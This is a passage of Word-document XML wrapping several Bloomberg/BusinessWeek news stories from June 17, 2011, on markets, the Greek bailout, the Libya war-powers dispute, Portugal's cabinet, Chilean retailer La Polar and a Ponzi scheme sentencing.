        <w:t>http://www.businessweek.com/news/2011-06-17/gm-will-idle-michigan-indiana-plants-to-pare-truck-supply.html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U.S. Stocks Rise as Dow Snaps Six-Week Drop on Greece,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2:53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BPZ Resources, MoodyБ─(tm)s, Scripps Networks: U.S. Equity Movers U.S. Stocks Advance on Better-Than-Estimated Economic Reports U.S. Stocks Slump Amid Europe Woes as Economic Data Disappoint Aveo, Boston Scientific, Capstone Turbine: U.S. Equity Movers U.S. Stocks Advance on Retail Sales, China Industrial Production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Rita Nazareth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U.S. stocks rose, snapping a six- week drop for the Dow Jones Industrial Average, as European leaders moved closer to a compromise on a Greek bailout and an index of leading American economic indicators beat estimates.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Wells Fargo &amp; Co. and Fifth Third Bancorp rose at least 1.4 percent, following gains in European banks. Airline companies rallied and energy shares retreated as oil sank 2 percent to settle at $93.01 a barrel. Research In Motion Ltd. tumbled 21 percent, sparking a slump in technology shares, after forecasting revenue and profit that missed analysts' estimates.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&amp; Poor's 500 Index rose 0.6 percent to 1,275.13 at 2:30 p.m. in New York. The gauge is now up 0.4 percent this week. The Dow average added 78.52 points, or 0.7 percent, to 12,040.04 today, extending this week's gain to 0.7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may be an excellent entry point for stock investors," said James Paulsen, the chief investment strategist at Minneapolis-based Wells Capital Management, which oversees about $340 billion. "There are expectations that an agreement on Greece's bailout may be reached. If we can get rid of the fears over Europe, it all comes down to - do we believe the economy will reaccelerate in the second half of this year? If that's the case, stocks have room to rally."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S&amp;P 500 fell 7 percent from this year's high at the end of April through yesterday amid weaker-than-expected economic data and concern about Europe's debt crisis. The decline threatened the 2011 gain for the S&amp;P 500, which was up 0.8 percent through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Stocks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stocks rose today as Chancellor Angela Merkel retreated from German demands that bondholders be forced to shoulder a "substantial" share of a Greek rescue, saying she'll work with the European Central Bank to avoid disrupting markets.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 like to have a participation of private creditors on a voluntary basis," Merkel told reporters in Berlin today at a joint press conference with French President Nicolas Sarkozy. This "should be worked out jointly with the ECB and there shouldn't be any dispute with the ECB on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Merkel and Sarkozy signaled a reconciliation between German calls for investors to help bail out Greece with warnings from the ECB and France that a compulsory move risked triggering the euro area's first sovereign default. Attention now shifts to Athens, where Prime Minister George Papandreou overhauled his Cabinet to try and secure passage of austerity measures needed for a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Leading Indicators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 extended gains after data showed that the index of U.S. leading indicators rebounded in May after declining for the first time in almost a year, a sign economic growth may pick up by the end of 2011. The Conference Board's gauge of the outlook for the next three to six months rose 0.8 percent after a revised 0.4 percent decline in April, the New York-based group said today. Economists forecast a 0.3 percent gain, according to the median estimate in a Bloomberg News survey.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Benchmark gauges rose even after the Thomson Reuters/University of Michigan preliminary index of consumer sentiment decreased to 71.8 from 74.3 in May. Economists forecast a reading of 74, according to the median estimate in a Bloomberg News survey.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is not as good as hoped, not as bad as feared," said Stephen Wood, the New York-based chief market strategist for Russell Investments, which manages about $161 billion. "It's most likely a soft patch and the economy is going to do better toward the end of the year. We expect a volatile ‘risk-on, risk-off'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Rally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gauge of banks in the S&amp;P 500 rose 0.8 percent. Wells Fargo added 1.6 percent to $27.22. Fifth Third advanced 1.4 percent to $12.45.</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Airlines rallied amid expectations for lower costs as crude oil fell. U.S. oil supplies rose to the highest level in 31 years for the month of May as refineries processed less crude amid a decline in gasoline demand, according to the American Petroleum Institute.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Bloomberg U.S. Airlines Index rose 2.6 percent. United Continental Holdings Inc. added 5.2 percent to $23.90. AMR Corp. gained 1.4 percent to $5.70.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Energy shares had the biggest decline in the S&amp;P 500 within 10 industries, falling 0.4 percent as a group. Halliburton Co. dropped 1.6 percent to $45.64. Occidental Petroleum Corp. retreated 1.1 percent to $101.74.</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Gauges of chipmakers and computer companies had the two biggest declines in the S&amp;P 500 within 24 industries.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RIMM Tumbles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RIM tumbled 21 percent to $27.89, the lowest since September 2006. RIM is losing market share in the U.S. to Apple Inc.'s iPhone and handsets running Google Inc.'s Android software, in part because it hasn't introduced a major new BlackBerry model since August. Cheaper Google phones are also making inroads in Latin America, Asia and Europe, threatening the popularity of less expensive BlackBerry models.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Marvell Technology Group Ltd., the maker of chips for personal computers and mobile phones, slumped 4.4 percent to $13.19. Jabil Circuit Inc., a contract electronics manufacturer, dropped 2.2 percent to $18.20.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Credit-rating companies declined after the Wall Street Journal reported that the U.S. Securities and Exchange Commission is considering laying civil fraud charges against some of the firms for their actions on mortgage- backed bonds, which helped trigger the financial crisis.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Moody's Corp. slipped 6.7 percent to $35.71 for the biggest loss in the S&amp;P 500. McGraw-Hill Cos. retreated 4.6 percent to $39.19.</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Joanna Ossinger, Michael Regan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Rita Nazareth in New York at rnazareth@bloomberg.net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Nick Baker at nbaker7@bloomberg.net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Greece's Economy U.S. Stock Market China's Economy U.S. Competitiveness US Economy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http://www.businessweek.com/news/2011-06-17/u-s-stocks-rise-as-dow-snaps-six-week-drop-on-greece-economy.html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Libya Dispute Has Obama and Boehner Recasting Old Arguments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2:29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Obama Tees Up With Boehner to Negotiate Fairways Not Budget Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Pentagon Starts Paring Troops in Afghan War as Drawdown Looms Boehner Says Lawmakers May Seek to Deny Libya Mission Funds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Talev and James Rowley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McCain Comments in 14th Paragraph and Oil Prices in 17th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House Speaker John Boehner once called the War Powers Resolution "constitutionally suspect." President Barack Obama, when he was a senator, argued that Congress must have the "backbone" to stand up to presidents when they want to send troops into battle.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mission in Libya now has the two men pitted against one another from opposite sides of the argument. The standoff has only escalated since the administration produced a 32-page report June 15 laying out the president's rationale for committing U.S. forces to an air campaign with NATO allies against Muammar Qaddafi's forces in Libya without congressional approval.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Lawmakers yesterday suggested two possible outcomes.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an Ohio Republican, said the House will look at options to force Obama's hand, including cutting off funding for the operation or blocking unrelated White House priorities. Democratic Senator Richard Durbin of Illinois, a close ally of Obama, said Congress should go ahead and give its support for military operations against Qaddafi's regime.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right thing to do is for Congress to approve of the president's action, make it official," Durbin said. "Whether it's necessary, if it includes reference to it and makes it clear that we are acting consistent with the war powers act, that's what I'm looking for."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issue is the War Powers Resolution, passed in 1973 in reaction to U.S. involvement in Vietnam. It has been at the center of struggles between presidents of both parties and Congress ever since.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Supporters and Critics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supporters of Obama and U.S. action against Qaddafi were critical of the administration's argument that the president doesn't need congressional authorization. In its report to Congress, the administration said the War Powers Resolution doesn't apply to the Libya mission because the United States is primarily in a support role and isn't engaged in hostilities as defined in the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report repeated that the White House would welcome a resolution of support that a bipartisan group of senators has drafted to "confirm that both branches are united in their commitment to supporting the aspirations of the Libyan people for political reform and self-government."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John McCain, an Arizona Republican and one of the sponsors of the resolution, said he found Obama's legal argument "hard to swallow." Senator Richard Lugar of Indiana, the top Republican on the Senate Foreign Relations Committee, called Obama's stance "both legally dubious and unwise."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Separation of Powers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 Jim Clyburn, a South Carolina Democrat, said Boehner "has a legitimate point."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all about separation of powers," Clyburn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Boehner's objections are joined by anti-war Democrats such as Ohio Representative Dennis Kucinich, who with nine other lawmakers has filed a lawsuit challenging the president's authority to carry out the mission.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end, McCain said, Republicans need to ask themselves if they want to take sides with Qaddafi against Obama.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administration may assert that we are not engaged in hostilities in Libya, but the Senate should go on record as authorizing these operations," he said in the text of a speech he delivered on the Senate floor yesterday. He said a resolution will be introduced soon.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49, ordered military action against Qaddafi's regime in March, saying he was acting to keep a "tyrant" from killing civilians protesting his rule. Since then the mission's lead has been transferred to the North Atlantic Treaty Organization.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Spreading Uprisings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conflict in Libya, which has Africa's largest proven oil reserves, followed uprisings elsewhere in North Africa and the Middle East that toppled long-time leaders in Egypt and Tunisia.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Violence in the region has helped push up oil prices, and futures are up 20 percent from a year ago. Crude oil for July delivery dropped $2.39, or 2.5 percent, to $92.56 a barrel at 1:05 p.m. on the New York Mercantile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 a Democrat, and Boehner have argued both sides of the issue in the past.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Boehner, 61, in 1999 argued against the invoking the War Powers Resolution to constrain then-President Bill Clinton's decision to initiate a NATO air campaign in Kosovo. Boehner said it would tie the hands of future presidents in responding to crises.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Obama's remarks were made in a 2007 speech at DePaul University in Chicago. An opponent of the Iraq war, Obama said the War Powers Resolution was written to make sure Congress wouldn't be "duped" into a war.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Legal Rationale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Scholars such as Mark Rozell, a public policy professor and expert on presidential powers at George Mason University in Arlington, Virginia, said Obama may be on thin legal ground with his current argument.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Rozell described Obama's rationale in the White House report as "clever, legalistic language" that relies on "bad precedents" over the past four decades in which Congress ultimately didn't punish presidents for acting without their consent.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overreached his constitutional authority,"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Louis Fisher, who worked for four decades as a specialist on separation of powers and constitutional law with the Library of Congress, said Obama miscalculated on his approach.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it had been a week or two, it would be OK," but as the conflict stretches into months, "now it's not OK. I think he's been giving the back of his hand to Congress."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Fisher said Obama has backed himself into a corner politically. "If he now has to come get authorization, people will say ‘Why didn't you do that back in February?'"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Fisher also said the United Nations Security Council authorized a mission to protect the Libyan people. The campaign has extended to ousting Qaddafi.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Unless Obama changes his approach with Congress, Fisher said, "I think it's going to get worse and worse" for him.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Laura Litvan and Roxana Tiron in Washington. Editors: Joe Sobczyk, Leslie Hoffecker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Margaret Talev in Washington at mtalev@bloomberg.net; James Rowley in Washington at jarowley@bloomberg.net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Stimulus Plan Obama's Economic Policy Obama's Healthcare Reform Fannie Mae and Freddie Mac Organic Food Industry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http://www.businessweek.com/news/2011-06-17/libya-dispute-has-obama-and-boehner-recasting-old-arguments.html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New Portugal Premier Coelho Picks Gaspar as Finance Minister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2:42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PortugalБ─(tm)s Passos Coelho to Meet President Cavaco Silva Today Rehn Urges Greek Cuts to Unlock Payment, Predicts Bond Deal Passos Coelho Wants Portugal to Return to Markets Faster Papandreou Reshuffle Fuels Allies Dissent as Markets Tumble Coelho Will Sign Portuguese Coalition Agreement Tomorrow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Joao Lima and Anabela Reis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details on Gaspar in second paragraph, names of other ministers in third.)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Pedro Passos Coelho, Portugal's incoming Social Democratic premier, named Vitor Gaspar as finance minister in a government that will be constrained by the terms of a 78 billion-euro ($112 billion) bailout program.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Gaspar, a special adviser to the Bank of Portugal, was head of the Bureau of European Policy Advisers at the European Commission from January 2007 to February 2010, and was director- general of research at the European Central Bank from September 1998 until December 2004, according to the website of Lisbon's Catholic University, where he is a professor.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leader of Passos Coelho's coalition partner, Paulo Portas, was named foreign minister, Alvaro Santos Pereira will be economy and employment minister, and Paulo Macedo will be health minister, according to a statement posted on the presidency's website. The government will be sworn in on June 21, Passos Coelho told reporters today following a meeting with President Anibal Cavaco Silva.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finance minister will have to implement an austerity plan that was a condition of the financial aid package from the European Union and the International Monetary Fund. With the country's debt and borrowing costs surging, Portugal followed Greece and Ireland in April in seeking a rescue.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Election Victory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Passos Coelho's Social Democrats and the People's Party signed an agreement yesterday to form a coalition following June 5 elections that gave the two parties combined a majority of seats in parliament. The Social Democrats defeated the Socialist Party of outgoing Prime Minister Jose Socrates in the vote.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Socrates' minority government fell in March after lawmakers rejected his proposed deficit-cutting plan as he struggled to avoid the bailout.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Borrowing costs have increased since Portugal requested aid. The difference in yield that investors demand to hold Portugal's 10-year bonds instead of German bunds reached a euro- era record of 820 basis points today, up from 511 basis points when Socrates sought the bailout on April 6. The 10-year bond yield reached 11.163 percent today and the five-year yield rose to 12.915 percent, also the highest levels since the euro was adopted in 2000.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Eddie Buckle, Willy Morris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Joao Lima in Lisbon at jlima1@bloomberg.net; Anabela Reis in Lisbon at areis1@bloomberg.net.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Tim Quinson at tquinson@bloomberg.net.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Small Business Financing New Zealand Business Middle Class Finances Infrastructure Financing Behavioral Finance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http://www.businessweek.com/news/2011-06-17/new-portugal-premier-coelho-picks-gaspar-as-finance-minister.html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Greek Bailout Leaves French Unruffled While Germany Seethes (2)</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2:13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MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits Papandreou Greek Б─≤OdysseyБ─(tm) Challenged by Confidence Vote Papandreou Names Evangelos Venizelos as Greek Finance Minister Papandreou Reshuffle Fuels Allies Dissent as Markets Tumble Greece Aid Talks Deadlock as Pressure on Papandreou Builds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Gregory Viscusi</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Merkel and Sarkozy comments from fifth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Greece's bailout, which has provoked popular anger in Germany, leaves neighboring France cold.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Europe's two largest economies, which were on opposite sides of a deadlock on enrolling investors in a second Greek rescue without triggering a default, said today in Berlin that they've found common ground. German Chancellor Angela Merkel's room for maneuver has been limited by opposition at home. French President Nicolas Sarkozy has faced no such pressure.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"France is a Latin country that feels closer to the Greeks; they also feel it could happen to them," said Philippe Moreau-Defarge, a researcher at the French Institute of International Relations, or IFRI, in Paris. "In Germany, it's the classic tale of the ant and the grasshopper, with the ant furious about having to pay for the grasshopper's profligacy."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face of turmoil in currency and credit markets, Merkel signaled willingness to compromise on German demands that bondholders shoulder a ‘substantial" share of a Greek rescue, saying she'll work with the European Central Bank to resolve the crisis. France, like the ECB, had sought a "voluntary" rollover of Greek debt by investors, warning that a compulsory move might constitute the euro area's first sovereign default.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 like to have a participation of private creditors on a voluntary basis," Merkel told reporters at a joint press conference with Sarkozy in Berlin today. "This should be worked out jointly with the ECB."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Sarkozy called the accord a "breakthrough."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Unification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politicians and media have voiced anger at having to come to the aid of what some of them say are profligate Greeks.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Germans digested unification and then went through an austerity cure," said IFRI's Moreau-Defarge. "They feel they've set a good example."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France, aiding Greece draws little angst in radio or television programs and in the press. In a poll in March last year by Greece's Sunday newspaper Ethnos, before the first bailout plan, 69.6 percent said the southern European country had French support compared with 2.7 percent for Germany.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"Helping Greece is very unpopular among German public opinion, so Merkel has made many populist comments to assure the public that she's looking after their tax money," said Henrik Uterwedde, deputy director of the French German Institute, based in Ludwigsburg and Paris. "The comments are aimed at her base, but they get projected across Europe. The problem is the German government cries scandal, and then ends up helping the Greeks. So they've angered their own public and the rest of Europe."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Taxpayer Protection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May 18, Merkel was cited by news agency DPA as saying: "It's not about whether people in Greece, Spain, Portugal can't retire earlier than in Germany; it's about everyone pulling their weight equally. We can't have one currency, and one gets a lot of vacation and the other very little."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France doesn't have the same culture of defending tax payer interests as Germany, Maurice Levy, chief executive officer of advertising company Publicis SA, said in an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even have a word in French for ‘taxpayer'," he said. "We call them ‘contributors,' which has a nice positive sound. There's a sense in France that we can always add to our obligations."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Protests in Greece against austerity measures have drawn angry opinion pieces in Germany. Writer Dirk Hoeren noted in Bild Zeitung, Germany's most- read newspaper, on May 18: "Germany's economic boom didn't fall from the sky. It was paid for through hard work and austerity. That's why it cannot be that some people practice frugality and foot the bill, while others go easy on themselves and cash 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Creditors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France, is "a country with a lot of protests, so they aren't shocked or surprised to see the Greeks protest against the austerity measures," said IFRI's Moreau-Defarge.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euro was created, the Germans insisted on the need for continuing with the Deutsche Bundesbank's culture of price stability, while French attention was on the potential of a common currency to boost economic growth,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Coverage in France of the Greek crisis has focused more on process. In an editorial in Le Figaro yesterday, Gaetan de Capele wrote that "wisdom lies in finding an exit from the crisis with the creditors rather than against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lenders were the biggest foreign owners of Greek government bonds with $22.7 billion in holdings last year, according to data compiled by the Bank for International Settlements in Basel, Switzerland.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Debt Holders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banks led the group of Greek creditors with overall claims amounting to $56.7 billion, trailing their German peers on sovereign debt with $15 billion, according to the June report from the BIS.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figure for French banks was inflated by $39.6 billion in lending to companies and households, mainly because of Credit Agricole's Greek unit, Emporiki Bank SA. German lenders have no major units in the country.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Germans are more worried about public accounts," said Philippe Marini, secretary of the French Senate Finance Committee. "The French always think a solution will be found, that the money will come from somewhere. Public accounts aren't something that keep the French up at night."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Pressure on euro-area governments to craft a rescue plan intensified this week after Standard &amp; Poor's slapped Greece with the world's lowest credit rating. Moody's placed the ratings of BNP Paribas, France's biggest bank, and local rivals Societe Generale SA and Credit Agricole under reviews that will focus on their holdings of Greek public and private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Pragmatism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reversed a decline against the dollar after Merkel and Sarkozy announced their accord. The European currency had been sliding amid speculation the Greek crisis is deteriorating, damping demand for the region's assets.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 was roiled by the impasse over the aid formula and speculation that a government shakeup in Greece will disrupt passage of 78 billion euros ($110 billion) in austerity measures needed for a new bailout from the European Union.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agreement between Germany and France a prerequisite for forging a European Union consensus behind the second bailout of Greece, the two sides have needed to strike a balance between German principles and French pragmatism.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 is in trouble, we have to help them because otherwise it would undermine the euro zone, so we just choose to overlook the background, which is that Greece cheated and previous Greek governments mismanaged the situation," said Publicis's Levy.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German reaction has been more like a family "that instead of putting out the fire in their house, sits around and fusses about the terms of their insurance contract," said Uterwedde at French German Institute.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Maria Petrakis in Athens, Chris Malpass in Frankfurt and Boris Groendahl in Vienna, Editors: Vidya Root, Angela Cullen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Gregory Viscusi in Paris at gviscusi@bloomberg.net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Vidya Root in Paris at vroot@bloomberg.net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MBA Jobs: Post-Crisis, a Brave New World Bitcoins: Currency of the Geeks The Big Business of Synthetic Highs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Germany's Economy Bailout Sales 2.0 Health 2.0 Market Research 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http://www.businessweek.com/news/2011-06-17/greek-bailout-leaves-french-unruffled-while-germany-seethes-2-.html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Greek Default to Hurt the Unhedged Most, Sheets Says: Tom Keene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2:16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Greek Credit-Default Swaps Fall After Merkel Signals Compromise Hunt for Б─≤Holy GrailБ─(tm) Pits ECB Against Naked Banks: Euro Credit Greek Bonds Sink, CDS Jump to Record as Default Concern Mounts Greece Credit-Default Swaps Surge to Record 2,189 Basis Points Greek Default Swaps Surge 280 Basis Points to Record 2,050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Daniel Kruger and Tom Keene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The biggest impact on the financial system from a default on Greek government debt would be on investors who didn't seek credit protection, according to Morgan Stanley's Andrew Sheets.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Credit-default swaps on Greece cover a net notional $5 billion, according to the Depository Trust &amp; Clearing Corp., which runs a central registry that captures most trades. That's just 1 percent of the Greek government's $482 billion of bonds and loans outstanding, according to data compiled by Bloomberg. Swaps pay buyers face value for the underlying securities or the cash equivalent if a borrower fails to adhere to its agreements.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 market is not hedged," Sheets, head of European credit strategy at Morgan Stanley in London, said in a radio interview on "Bloomberg Surveillance" with Tom Keene and Ken Prewitt. "That obviously creates a segment of the market that has a vested interest in delaying or avoiding a hard restructuring in the near term."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Credit-default swaps on Greece rose to a record 2,237 basis points yesterday before slipping today to 1,933 basis points. A basis point on a credit-default swap protecting 10 million euros ($14.3 million) of debt from default for five years is equivalent to 1,000 euros a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the primary risk comes through the credit- default swaps; we think it comes through those other connections between a country and the broader system," Sheets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one-third of Greece's debt is held domestically, of which half is held by the nation's banks, while two-thirds is held by international investors, Sheets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agreement that would require all bondholders to participate in a Greek rescue would have a bigger impact on financial markets and would be more likely to trigger swap contracts, Sheets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it's voluntary, I think markets would be more comfortable with it," which would reduce the likelihood that guarantors would be forced to pay on the swaps,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Ken Prewitt in New York. Editors: Greg Storey, Paul Cox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Daniel Kruger in New York at dkruger1@bloomberg.net; Tom Keene in New York at tkeene@bloomberg.net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Dave Liedtka at dliedtka@bloomberg.net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The Foreign Exchange Market Marketing to Moms Marketing to Women Technology in the Classroom Over the Counter Derivatives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http://www.businessweek.com/news/2011-06-17/greek-default-to-hurt-the-unhedged-most-sheets-says-tom-keene.html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Obama Tees Up With Boehner to Negotiate Fairways Not Budget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2:50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Libya Dispute Has Obama and Boehner Recasting Old Arguments Biden Says Deficit Talks Seek Signal With $4 Trillion in Savings Obama Said to Talk With CommerceБ─(tm)s Blank on Economist Job Boehner Says Lawmakers May Seek to Deny Libya Mission Funds Libya Mission Will Violate War Powers June 19, Boehner Says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Margaret Talev</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They can fight about the debt ceiling and the war in Libya next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Tomorrow, weather permitting, President Barack Obama and House Speaker John Boehner will swap rhetoric for clubs and partisanship for par.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and Boehner, an Ohio Republican, will meet on an as yet undisclosed course in the Washington area for their debut golf outing together. The goal, according to aides, is to forge a closer relationship that might help down the road in negotiations, rather than come off the links with a deal to cut the federal debt.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know that one golf match will do it but it's a good beginning," said Representative Jim Clyburn, a South Carolina Democrat who has played rounds with both men.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Vice President Joe Biden and Ohio Governor John Kasich will round out the foursome.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day jobs, Obama wields more power than Boehner. On the course, Boehner has the clout. In its June issue, Golf Digest ranked Boehner the 43rd best golfer in Washington with a 7.9 handicap. That trumps Obama's estimated 17 handicap, putting him 108 on Golf Digest's list.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Kasich's spokesman, Rob Nichols, described the governor as within spitting distance of an 8 handicap.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Obama's not-so-secret weapon is Biden. Golf Digest puts his handicap at 6.3, making him 29th on the list of the capital's 150 best golfers.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Relaxed Style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Terry Holt, a Republican consultant and former Boehner aide, said on the course the House speaker is "very relaxed and easy-going." Holt said Boehner also loves the strategy of the game and enjoys sharing tips on how to make tough putts.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Clyburn described Obama as a moderate risk-taker on the course, focused if he lands in a sand trap yet relaxed enough to chat off-topic. During their game last summer at Martha's Vineyard, Clyburn said Obama "took the time to get to know more about me. He asked a lot of questions about my parents and growing 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Nichols said Kasich had no plans to talk about policy: "Nothing is more unnerving than to be squawking about debt ceilings during another guy's backswing,"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contentious budget talks will be prominent in the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 is the administration's point man in negotiations with Congress on cutting the deficit and raising the debt ceiling. He wrapped up three days of talks yesterday with a group of lawmakers who are trying to hash out a plan to shrink the government's long-term deficit by at least $4 trillion over about a decade. The aim is to reach a budget-reduction deal in time for Congress to meet an Aug. 2 deadline for raising the nation's $14.3 trillion debt limit.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Budget Background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Kasich led the House Budget Committee when Republicans took control of the House in 1995 and was a linchpin in negotiations with Democratic President Bill Clinton on cutting spending and the deficit. He won Ohio's governorship last year by defeating a Democratic incumbent in a swing state that is key to Obama's 2012 re-election strategy.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issue of protocol hasn't been publicly resolved. Boehner, 61, smokes cigarettes. Obama, 49, gave up the habit under pressure from first lady Michelle Obama after he became president. Asked by reporters whether Obama would ask Boehner to refrain while on the course, White House Press Secretary Jay Carney said, "I'm sure that the president will be a fine host."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match isn't the only game in town drawing attention. It will play out in private, while top professionals play the penultimate day of the U.S. Open at Congressional Country Club in Bethesda, Maryland, about 12 miles northwest of the White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Presidential History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Trostel, curator and historian at the USGA Museum in Far Hills, New Jersey, the archive for the sport's ruling body in the U.S., said that since William Howard Taft in 1909 all but three presidents - Hoover, Truman and Carter - have played golf.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Lyndon B. Johnson used golf to help round up support for the Civil Rights Act in 1964, Trostel said, "It seems like a lot of presidents play the game to get away from the pressures of the office."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other politicians, he said, "it seems like it's the exact opposite reasons, to push through legislation or garner some votes for a bill they're supporting."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Trostel said in the Depression era, President Franklin D. Roosevelt's New Deal program led to the development of more than 300 of the nation's public courses.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Boost for Golf</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match may give a boost to the sport, which has stagnated in recent years under pressure from demographic and economic trends.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golfers numbered 30 million in 2005 and 26.1 million last year, according to statistics released by the National Golf Foundation in Jupiter, Florida.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"Golf can use all the publicity it can get," said Stuart Lindsay, principal at Edgehill Golf Advisors in Mequon, Wisconsin.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Golf, a coalition of golf associations and industry members, yesterday released a statement highlighting the Obama- Boehner game's potential to improve "many critical challenges facing the nation" and saying that golf supports 2 million U.S.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 Nathan, senior vice president for the National Golf Foundation, also praised Obama and Boehner and said that "love for golf is a common ground that can be very effective at building bridges between people of different views."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Joe Sobczyk, Robin Meszoly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Margaret Talev in Washington at mtalev@bloomberg.net.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Mark Silva at msilva34@bloomberg.net.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Economy's Fundamentals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Synthetic Drugs Dodge Law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Bitcoins: Currency of the Geeks MBA Jobs: Post-Crisis, a Brave New World The Big Business of Synthetic Highs Why Apple Isn't in the Dow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Obama's Economic Policy Obama's Stimulus Plan Obama's Healthcare Reform Online Retail Wireless Communication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22:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/obama-tees-up-with-boehner-to-negotiate-fairways-not-budget.html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La Polar Estimates $1 Billion Provision, Seeks Bond Waivers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2:00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Sinking Yields Fueling Debt-Refinancing Plans: Mexico Credit Falabella Drop Unwarranted as Celfin Recommends Chile Retailers Aval Listing on NYSE Would Seek as Much as $1 Billion Chile Raises $982 Million in Sale of Aguas Andinas Stock Chile Slows Pace of Rate Rise as 5.25% Seen Near Б─≤NeutralБ─(tm)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Eduardo Thomson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Ebitda ratio in fifth paragraph, retail stock prices in 13th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Empresas La Polar SA, the Chilean department-store chain under investigation for consumer-lending irregularities, doubled its estimate for additional loan-loss provisions and said total charges may reach $1.14 billion.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 Polar, which is on a trading halt, may need to incur a further 420 billion-peso charge, according to a statement posted today on the securities regulator's website, compared with a June 9 estimate of as much as 200 million pesos. La Polar said it may have to set aside a total of 538 billion pesos ($1.14 billion), including a previously-recorded bad loan charge.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board, along with financial adviser Larrain Vial SA, is working on a plan to extend maturities of bank loans, waive some bond covenants and sell new shares, La Polar wrote today. The company will meet with shareholders June 22 and bondholders July 29. La Polar securities have been suspended since June 13 after shares plunged 39 percent to 1,430 pesos and at least one bond spread reached so-called distressed levels.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calculated that if the extra provisions were 200 billion pesos, the stock could fall to 910 pesos, and if they were 240 billion pesos, the stock would slump to 670 pesos," said Claudio Gonzalez, head of research at Tanner Corredores de Bolsa SA in Santiago. "With the new figure, much higher than we expected, the price would fall a lot lower than that."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revised total loan-loss provision estimate is more than 10 times last year's earnings before interest, taxes, depreciation, and amortization, according to Bloomberg data.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Share Sale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 Polar plans to proceed with a June 22 shareholder meeting to discuss the sale of $400 million in new shares. The company planned to use the funds for its expansions and shore up its finances, according to a May 27 statement, before the irregularities were announced. The board will seek to waive bond payment acceleration and default covenants, the statement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"Completing this capital increase is critical to have a company that continues operating," Juan Andres Camus, Chairman of Celfin Capital SA, said yesterday in an interview. "If it doesn't happen, bondholders will be facing a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extra yield, or spread, investors demand to hold La Polar's inflation- indexed bonds due in 2012 instead of similar- maturity central bank debt jumped to 1,894 basis points, or 18.94 percentage points, on June 10, compared with 1.54 percentage points on May 25 when the bonds last traded, according to data from the Santiago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Changed Terms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executives changed terms on non-performing consumer credit without consulting clients or informing the board, Heriberto Urzua, who replaced Pablo Alcalde as chairman last week, told reporters.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Banking and securities regulatory agencies are investigating the case and the government will probe any related criminal acts, Finance Minister Felipe Larrain told reporters in Santiago last night. Authorities are taking steps to protect the financial system, investors and members of the public,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 Polar hired a unit of Deloitte Touche Tohmatsu to audit its consumer loans portfolio and expects to have a final provisions figure in three months, it said June 13.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may modify lending rules for retailers, Deputy Finance Minister Rodrigo Alvarez said yesterday.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Cencosud SA and SACI Falabella, Chile's two largest retailers, rose in Santiago trading today, rebounding from a slump spurred by La Polar's lending irregularities.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 ‘Overreaction'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fall yesterday was an overreaction," Marcelo Barrero, an analyst at brokerage firm Euroamerica Corredores de Bolsa SA, said today in a phone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Cencosud rose 2.7 percent to 3,225 pesos at 12:21 p.m. New York time, after rising 5.2 percent, the most in three months. Falabella climbed 0.7 percent to 4,540 pesos and surged as much as 5.4 percent, the most since September.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fall, without a doubt, represents an investment opportunity," Camus, whose company oversees about $10 billion in assets, said yesterday, referring to La Polar's larger rivals. "These companies are very well managed. I don't see this as a systemic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in La Polar shares is suspended through today, the securities regulator said June 13.</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Camila Russo in Santiago. Editors: James Attwood, Brendan Walsh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Eduardo Thomson in Santiago at ethomson1@bloomberg.net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David Papadopoulos at papadopoulos@bloomberg.net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Virgin Atlantic Mulls Alliances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MBA Jobs: Post-Crisis, a Brave New World Bitcoins: Currency of the Geeks The Big Business of Synthetic Highs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Municipal Bonds Balkan Business Semiconductors Baseball Business Pharmaceuticals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21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/la-polar-estimates-1-billion-provision-seeks-bond-waivers.html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Brooklyn Money Manager Gets 20 Years for Ponzi Scheme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2:00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MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Ex-Credit Suisse Broker Butler Gets Fraud Conviction Tossed Ex-Barai Analyst Admits Destroying Data After Rajaratnam Arrest Rajaratnam Arrest Led Hedge Fund Analyst to Destroy Insider Data New York Б─≤Boiler RoomБ─(tm) Salesman Pleads Guilty During Trial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Thom Weidlich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Barry's comment in the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Philip Barry, a money manager from Brooklyn, New York, was sentenced to 20 years in prison for running a $45 million Ponzi scheme that defrauded hundreds of investors over three decades.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Barry, 53, was sentenced today by U.S. District Judge Raymond J. Dearie in Brooklyn. After a one-week trial in November, a jury convicted him on all the counts he faced - one of securities fraud and 33 of mail fraud.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hurt a lot of people," Barry told Dearie before being sentenced. "I do not wish to hide how bad it was."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Barry, a resident of the Bay Ridge section of Brooklyn, began accepting money in 1978 from investors, guaranteeing fictional annual profits, according to prosecutors in the office of U.S. Attorney Loretta Lynch. Instead, he used new investors' money to pay earlier ones, prosecutors said. His fraud is believed to be the longest-lasting Ponzi scheme in U.S. history,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action, the U.S. Securities and Exchange Commission said Barry diverted some of the investor money to a mail-order pornography business. In April, the SEC asked the court to dismiss a libel suit Barry brought over the accusation.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criminal case is U.S. v. Barry, 09-cr-0833, the SEC case is Securities and Exchange Commission v. Barry, 09-cv-3860, and Barry's suit against the SEC is Barry v. SEC, 10-cv-4071, U.S. District Court, Eastern District of New York (Brooklyn).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assistance from Patricia Hurtado in New York. Editors: Mary Romano, Andrew Dunn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Thom Weidlich in Brooklyn, New York, federal court at tweidlich@bloomberg.net.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Virgin Atlantic Mulls Alliances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MBA Jobs: Post-Crisis, a Brave New World Bitcoins: Currency of the Geeks The Big Business of Synthetic Highs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Pharmacy Benefit Managers (PBMs) Money Market Funds Obama's Stimulus Plan Investment Scams Office 2.0</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21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
